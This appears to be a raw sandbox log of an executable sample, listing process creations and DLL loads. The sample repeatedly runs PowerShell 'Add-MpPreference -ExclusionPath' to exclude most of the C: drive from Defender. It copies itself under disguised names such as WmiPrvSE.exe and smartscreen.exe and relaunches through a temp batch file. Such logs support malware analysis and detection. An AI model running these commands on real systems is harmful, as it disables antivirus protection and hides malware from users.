Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
Source: unknown Process created: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
Source: unknown Process created: C:\Users\user\Downloads\smartscreen.exe C:\Users\user\Downloads\smartscreen.exe
Source: unknown Process created: C:\Users\user\Downloads\smartscreen.exe C:\Users\user\Downloads\smartscreen.exe
Source: unknown Process created: C:\Recovery\WmiPrvSE.exe C:\Recovery\WmiPrvSE.exe
Source: unknown Process created: C:\Recovery\WmiPrvSE.exe C:\Recovery\WmiPrvSE.exe
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat"
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
